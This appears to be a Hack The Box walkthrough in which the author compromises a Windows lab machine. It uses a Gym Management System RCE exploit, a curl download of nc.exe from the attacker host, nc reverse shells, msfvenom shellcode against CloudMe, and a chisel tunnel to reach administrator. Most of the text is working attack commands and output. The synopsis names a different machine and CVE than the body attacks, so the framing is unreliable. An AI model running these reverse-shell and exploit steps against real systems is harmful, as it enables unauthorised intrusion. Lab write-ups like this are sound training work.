From the HackTheBox
SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.
Enumeration
# Nmap 7.80 scan initiated Fri Sep 25 20:44:58 2020 as: nmap -sV -sC -Pn -oA nmap --script vuln 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.34s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.198
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.198:8080/
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/facilities.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/packages.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/about.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/contact.php
| Form id:
| Form action: include/process_login.php
|
| Path: http://10.10.10.198:8080/index.php
| Form id:
|_ Form action: include/process_login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /icons/: Potentially interesting folder w/ directory listing
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.4.43:
| CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425
| CVE-1999-1412 10.0 https://vulners.com/cve/CVE-1999-1412
| CVE-1999-1237 10.0 https://vulners.com/cve/CVE-1999-1237
| CVE-1999-0236 10.0 https://vulners.com/cve/CVE-1999-0236
| CVE-2009-1955 7.8 https://vulners.com/cve/CVE-2009-1955
| CVE-2007-6423 7.8 https://vulners.com/cve/CVE-2007-6423
| CVE-2007-0086 7.8 https://vulners.com/cve/CVE-2007-0086
| CVE-2020-11984 7.5 https://vulners.com/cve/CVE-2020-11984
| CVE-2009-3095 7.5 https://vulners.com/cve/CVE-2009-3095
| CVE-2007-4723 7.5 https://vulners.com/cve/CVE-2007-4723
| CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891
| CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890
| CVE-2008-2579 6.8 https://vulners.com/cve/CVE-2008-2579
| CVE-2007-5156 6.8 https://vulners.com/cve/CVE-2007-5156
| CVE-2020-9490 5.0 https://vulners.com/cve/CVE-2020-9490
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2011-1752 5.0 https://vulners.com/cve/CVE-2011-1752
| CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452
| CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408
| CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699
| CVE-2007-0450 5.0 https://vulners.com/cve/CVE-2007-0450
| CVE-2005-1268 5.0 https://vulners.com/cve/CVE-2005-1268
| CVE-2003-0020 5.0 https://vulners.com/cve/CVE-2003-0020
| CVE-2001-1556 5.0 https://vulners.com/cve/CVE-2001-1556
| CVE-1999-0678 5.0 https://vulners.com/cve/CVE-1999-0678
| CVE-1999-0289 5.0 https://vulners.com/cve/CVE-1999-0289
| CVE-1999-0070 5.0 https://vulners.com/cve/CVE-1999-0070
| CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195
| CVE-2020-11993 4.3 https://vulners.com/cve/CVE-2020-11993
| CVE-2011-1783 4.3 https://vulners.com/cve/CVE-2011-1783
| CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434
| CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939
| CVE-2008-2168 4.3 https://vulners.com/cve/CVE-2008-2168
| CVE-2008-0455 4.3 https://vulners.com/cve/CVE-2008-0455
| CVE-2007-6420 4.3 https://vulners.com/cve/CVE-2007-6420
| CVE-2007-6388 4.3 https://vulners.com/cve/CVE-2007-6388
| CVE-2007-5000 4.3 https://vulners.com/cve/CVE-2007-5000
| CVE-2007-4465 4.3 https://vulners.com/cve/CVE-2007-4465
| CVE-2007-1349 4.3 https://vulners.com/cve/CVE-2007-1349
| CVE-2007-6422 4.0 https://vulners.com/cve/CVE-2007-6422
| CVE-2007-6421 3.5 https://vulners.com/cve/CVE-2007-6421
|_ CVE-2001-0131 1.2 https://vulners.com/cve/CVE-2001-0131
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 20:51:08 2020 -- 1 IP address (1 host up) scanned in 370.35 seconds
I found port 8080 is open.
Local Privilege Escalation
I searched gym in metasploit and found 48506.py.
$ searchsploit gym
[i] Found (#1): /home/ikkyu/exploitdb/files_exploits.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_exploits.csv" (package_array: exploitdb)
[i] Found (#1): /home/ikkyu/exploitdb/files_shellcodes.csv
[i] To remove this message, please edit "/home/ikkyu/exploitdb/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I run this.
$ python ~/exploitdb/exploits/php/webapps/48506.py http://10.10.10.198:8080/
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload>
C:\xampp\htdocs\gym\upload> whoami
�PNG
�
buff\shaun
Now I got the machine. Next we neet to upload nc.exe to upgrade shell.
At local machine:
$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
At target machine:
C:\xampp\htdocs\gym\upload> curl http://10.10.14.6:8000/nc.exe -o nc.exe
�PNG
�
C:\xampp\htdocs\gym\upload> dir
�PNG
�
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of C:\xampp\htdocs\gym\upload
22/12/2020 12:04 <DIR> .
22/12/2020 12:04 <DIR> ..
22/12/2020 12:04 53 kamehameha.php
22/12/2020 11:40 38,616 nc.exe
2 File(s) 38,669 bytes
2 Dir(s) 7,315,296,256 bytes free
I succeeded in uploading.
Now we can get a reverse shell.
At local machine:
rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
At target machine:
C:\xampp\htdocs\gym\upload> nc.exe 10.10.14.6 4444 -e cmd.exe
At local machine:
rlwrap nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.198 49682
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>
I got a reverse shell.
Administrator Privilege Escalation
I checked process.
C:\xampp\htdocs\gym\upload>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 44 K
Registry 104 0 7,392 K
smss.exe 368 0 384 K
csrss.exe 456 0 3,856 K
wininit.exe 532 0 4,608 K
csrss.exe 540 1 3,452 K
winlogon.exe 604 1 8,888 K
services.exe 676 0 8,296 K
lsass.exe 696 0 12,072 K
svchost.exe 812 0 2,520 K
fontdrvhost.exe 836 0 13,900 K
fontdrvhost.exe 844 1 8,100 K
svchost.exe 860 0 22,724 K
svchost.exe 956 0 12,036 K
svchost.exe 1004 0 6,028 K
dwm.exe 328 1 41,676 K
svchost.exe 360 0 8,292 K
svchost.exe 948 0 7,100 K
svchost.exe 996 0 9,664 K
svchost.exe 1076 0 18,084 K
svchost.exe 1136 0 18,504 K
svchost.exe 1208 0 5,984 K
svchost.exe 1280 0 5,680 K
svchost.exe 1380 0 8,672 K
svchost.exe 1388 0 10,612 K
svchost.exe 1408 0 4,044 K
svchost.exe 1416 0 7,352 K
svchost.exe 1516 0 9,604 K
svchost.exe 1552 0 12,944 K
Memory Compression 1564 0 30,132 K
svchost.exe 1592 0 7,004 K
svchost.exe 1676 0 6,028 K
svchost.exe 1772 0 5,036 K
svchost.exe 1780 0 5,792 K
svchost.exe 1824 0 6,956 K
svchost.exe 1880 0 8,588 K
svchost.exe 1988 0 6,180 K
svchost.exe 1456 0 6,364 K
svchost.exe 1336 0 7,044 K
svchost.exe 1240 0 4,432 K
svchost.exe 2060 0 7,564 K
svchost.exe 2132 0 9,108 K
svchost.exe 2284 0 5,600 K
spoolsv.exe 2300 0 12,040 K
svchost.exe 2424 0 6,124 K
svchost.exe 2736 0 7,660 K
svchost.exe 2748 0 14,036 K
svchost.exe 2760 0 19,308 K
svchost.exe 2768 0 3,696 K
svchost.exe 2756 0 4,532 K
vmtoolsd.exe 2788 0 18,696 K
svchost.exe 2796 0 13,656 K
svchost.exe 2804 0 15,532 K
SecurityHealthService.exe 2832 0 13,048 K
MsMpEng.exe 2864 0 169,640 K
VGAuthService.exe 2880 0 7,840 K
svchost.exe 2980 0 7,080 K
svchost.exe 2052 0 9,868 K
svchost.exe 3104 0 9,768 K
svchost.exe 3144 0 3,568 K
dllhost.exe 3660 0 11,308 K
WmiPrvSE.exe 3848 0 14,188 K
msdtc.exe 2720 0 8,132 K
svchost.exe 4540 0 30,464 K
sihost.exe 4596 1 21,576 K
svchost.exe 4620 1 11,716 K
svchost.exe 4672 1 24,212 K
taskhostw.exe 4768 1 9,896 K
svchost.exe 4932 0 5,548 K
ctfmon.exe 4992 1 10,796 K
svchost.exe 5080 0 5,848 K
svchost.exe 5092 0 11,500 K
NisSrv.exe 5212 0 7,268 K
WmiPrvSE.exe 5276 0 18,888 K
explorer.exe 5716 1 79,172 K
svchost.exe 5776 0 16,212 K
svchost.exe 5796 0 11,372 K
svchost.exe 5960 0 5,312 K
svchost.exe 6000 0 12,380 K
svchost.exe 5444 0 4,852 K
svchost.exe 4416 0 4,976 K
ShellExperienceHost.exe 1048 1 51,772 K
SearchUI.exe 6360 1 118,800 K
RuntimeBroker.exe 6588 1 16,452 K
ApplicationFrameHost.exe 6780 1 26,996 K
MicrosoftEdge.exe 7072 1 55,284 K
browser_broker.exe 7160 1 6,876 K
svchost.exe 6316 0 4,668 K
Windows.WARP.JITService.e 4404 0 3,380 K
RuntimeBroker.exe 4356 1 5,012 K
MicrosoftEdgeCP.exe 4220 1 18,920 K
RuntimeBroker.exe 4464 1 13,908 K
MicrosoftEdgeCP.exe 2672 1 21,300 K
svchost.exe 7332 0 11,264 K
conhost.exe 7464 0 1,008 K
SearchIndexer.exe 8140 0 23,680 K
MSASCuiL.exe 7424 1 6,812 K
vmtoolsd.exe 5748 1 13,220 K
httpd.exe 1712 0 460 K
mysqld.exe 7716 0 3,480 K
svchost.exe 2572 0 3,636 K
svchost.exe 5304 1 14,224 K
httpd.exe 1460 0 9,188 K
svchost.exe 6552 0 12,824 K
SgrmBroker.exe 2296 0 2,704 K
svchost.exe 8248 0 6,984 K
CompatTelRunner.exe 1104 0 632 K
conhost.exe 8608 0 1,216 K
svchost.exe 7788 0 8,192 K
Microsoft.Photos.exe 2528 1 5,240 K
RuntimeBroker.exe 3856 1 12,252 K
WinStore.App.exe 8424 1 26,440 K
RuntimeBroker.exe 4556 1 5,240 K
SystemSettings.exe 7764 1 32,228 K
svchost.exe 5984 0 4,748 K
svchost.exe 7484 0 9,652 K
taskhostw.exe 5920 1 20,872 K
taskhostw.exe 3520 0 23,440 K
CompatTelRunner.exe 1548 0 2,428 K
conhost.exe 8792 0 9,736 K
TrustedInstaller.exe 1016 0 5,524 K
svchost.exe 196 0 5,352 K
TiWorker.exe 2148 0 103,996 K
svchost.exe 8784 0 7,844 K
svchost.exe 6488 0 3,792 K
svchost.exe 8596 0 11,860 K
cmd.exe 7204 0 2,432 K
conhost.exe 9176 0 9,132 K
nc.exe 7192 0 5,436 K
cmd.exe 4504 0 3,988 K
cmd.exe 708 0 3,208 K
conhost.exe 2452 0 10,868 K
CloudMe.exe 3496 0 26,884 K
timeout.exe 5968 0 3,920 K
tasklist.exe 8796 0 7,772 K
I found CloudMe.exe. CloudMe is known to be vulnerable. I searched cloudme in metasploit.
$ searchsploit cloudme
--------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASL | win
ws/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASL | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasplo | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(D | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Over | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghu | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 ( | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) | windows_x86-64/remote/44784.py
--------------------------------------------------- ---------------------------------
Shellcodes: No Results
I found 48389.py. I searched about this on exploit-db.
Now we need to modify this code a bit and remote port forwarding on the target machine.You can see from the exploit-db that the default is to launch the calculator.
I created payload. Here, the port is set to 4445, but it can be anything.
$ msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.28 4445 -e cmd.exe' -b '\x00\x0A\x0D' -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 273 (iteration=0)
x86/shikata_ga_nai chosen with final size 273
Payload size: 273 bytes
Final size of python file: 1452 bytes
payload = b""
payload += b"\xda\xcf\xd9\x74\x24\xf4\xbe\xe3\xce\xa2\x54\x5a"
payload += b"\x29\xc9\xb1\x3e\x31\x72\x19\x83\xea\xfc\x03\x72"
payload += b"\x15\x01\x3b\x5e\xbc\x47\xc4\x9f\x3d\x27\x4c\x7a"
payload += b"\x0c\x67\x2a\x0e\x3f\x57\x38\x42\xcc\x1c\x6c\x77"
payload += b"\x47\x50\xb9\x78\xe0\xde\x9f\xb7\xf1\x72\xe3\xd6"
payload += b"\x71\x88\x30\x39\x4b\x43\x45\x38\x8c\xb9\xa4\x68"
payload += b"\x45\xb6\x1b\x9d\xe2\x82\xa7\x16\xb8\x03\xa0\xcb"
payload += b"\x09\x22\x81\x5d\x01\x7d\x01\x5f\xc6\xf6\x08\x47"
payload += b"\x0b\x32\xc2\xfc\xff\xc9\xd5\xd4\x31\x32\x79\x19"
payload += b"\xfe\xc1\x83\x5d\x39\x39\xf6\x97\x39\xc4\x01\x6c"
payload += b"\x43\x12\x87\x77\xe3\xd1\x3f\x5c\x15\x36\xd9\x17"
payload += b"\x19\xf3\xad\x70\x3e\x02\x61\x0b\x3a\x8f\x84\xdc"
payload += b"\xca\xcb\xa2\xf8\x97\x88\xcb\x59\x72\x7f\xf3\xba"
payload += b"\xdd\x20\x51\xb0\xf0\x35\xe8\x9b\x9e\xc8\x7e\xa6"
payload += b"\xed\xca\x80\xa9\x41\xa2\xb1\x22\x0e\xb5\x4d\xe1"
payload += b"\x6a\x49\x04\xa8\xdb\xc1\xc1\x38\x5e\x8c\xf1\x96"
payload += b"\x9d\xa8\x71\x13\x5e\x4f\x69\x56\x5b\x14\x2d\x8a"
payload += b"\x11\x05\xd8\xac\x86\x26\xc9\xee\x12\x84\x8a\x91"
payload += b"\x0f\x44\x1b\x0e\xb8\xd0\xbf\xc1\x5b\x6b\x1c\x79"
payload += b"\xe5\xe6\xc0\xf0\x65\x94\x97\x9b\xe1\x38\x06\x3f"
payload += b"\xc4\xa5\xae\xda\x38\x14\x7f\x0b\x08\x66\x51\x62"
payload += b"\x5e\xa8\x9f\xbc\xbe\x80\xeb\x88\x8b\xc8\x3e\x94"
payload += b"\xd3\x6b\x2c\x32\x3a\x0e\xd6\xdf\x42"
Replace the payload part of 48389.py.
Next, we need to upload chisel.exe to remote port forwarding as before. After uploading,at local machine:
$ chisel server -p 1234 -reverse -v
2021/01/07 17:33:38 server: Reverse tunnelling enabled
2021/01/07 17:33:38 server: Fingerprint Wf5cpZzaVbfNXiWNsUT8AEcLYgEeOI7r3U440nagv08=
2021/01/07 17:33:38 server: Listening on http://0.0.0.0:1234
At target machine:
C:\xampp\htdocs\gym\upload>chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
chisel.exe client -v 10.10.14.28:1234 R:8888:127.0.0.1:8888 --keepalive:1000
2021/01/07 07:31:30 client: Connecting to ws://10.10.14.28:1234
2021/01/07 07:31:30 client: tun: proxy#1000=>--keepalive:1000: Listening
2021/01/07 07:31:30 client: tun: Bound proxies
2021/01/07 07:31:31 client: Handshaking...
2021/01/07 07:31:33 client: Sending config
2021/01/07 07:31:33 client: Connected (Latency 336.4421ms)
2021/01/07 07:31:33 client: tun: SSH connected
Now start a netcat listener on 4445 and execute the pyload on the second terminal.
$ nc -lnvp 4445
Listening on 0.0.0.0 4445
Connection received on 10.10.10.198 49686
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
We got the admin.
Top comments (1)
Ouch! How do you mitigate?